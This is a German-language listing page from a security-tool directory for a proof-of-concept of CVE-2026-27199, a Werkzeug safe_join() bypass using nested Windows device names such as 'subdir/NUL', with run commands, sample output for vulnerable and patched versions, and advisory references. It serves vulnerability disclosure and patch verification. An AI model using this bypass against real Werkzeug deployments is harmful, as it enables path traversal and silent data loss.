Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-27199-werkzeug-safe-join-bypass-PoC — Proof-of-Concept-Exploit für CVE-2026-27199, einen Werkzeug-safe_join()-Bypass für Windows-Gerätenamen, der Pfad-Traversal und stilles Verwerfen von Daten demonstriert. | Kitploit
Tools/GitHubGitHub/alimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc
SchwachstellenanalyseExploitationWebsicherheitPapers & ForschungLernen & Bildung
GitHubalimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc

CVE-2026-27199-werkzeug-safe-join-bypass-PoC

Proof-of-Concept-Exploit für CVE-2026-27199, einen Werkzeug-safe_join()-Bypass für Windows-Gerätenamen, der Pfad-Traversal und stilles Verwerfen von Daten demonstriert.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-27199 PoC: Werkzeug safe_join() Windows-Gerätenamen-Bypass

Status: Öffentlich offengelegt. Behoben in werkzeug 3.1.6.
Schweregrad: Mittel
Melder: @alimezar
Advisory: GHSA-29vq-49wr-vm6x


Betroffene Versionen

PaketBetroffenBehoben
werkzeug< 3.1.63.1.6

Proof of Concept

Erfordert: Windows, Python 3.8+, werkzeug < 3.1.6

root@kitploit:~
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py

Erwartete Ausgabe (verwundbare Version)

root@kitploit:~
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name          : nt

[+] safe_join(base, 'NUL')        -> None  (korrekt blockiert)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL  (Bypass!)

[*] Versuche, in den zurückgegebenen Pfad zu schreiben ...
[!] open(verschachteltes NUL) write: ERFOLG — Daten stillschweigend vom Gerät verworfen

[!] VERWUNDBAR: CVE-2026-27199 auf dieser Installation bestätigt.
    Upgrade auf werkzeug >= 3.1.6 zur Behebung durchführen.

Erwartete Ausgabe (gepatchte Version)

root@kitploit:~
[+] safe_join(base, 'subdir/NUL') -> None  (korrekt blockiert)
[+] NICHT VERWUNDBAR: Verschachtelter Gerätename wurde blockiert.

Referenzen

  • GHSA-29vq-49wr-vm6x — dieses Advisory
  • GHSA-hgf8-39gv-g3f2 — vorheriges verwandtes Advisory
  • GHSA-87hc-h4r5-73f7 — vorheriges verwandtes Advisory
  • Werkzeug-Changelog

Dieses PoC wird zu Bildungs- und Verteidigungszwecken veröffentlicht, nach verantwortungsvoller Offenlegung und öffentlicher Verfügbarkeit des Patches.

Tool herunterladen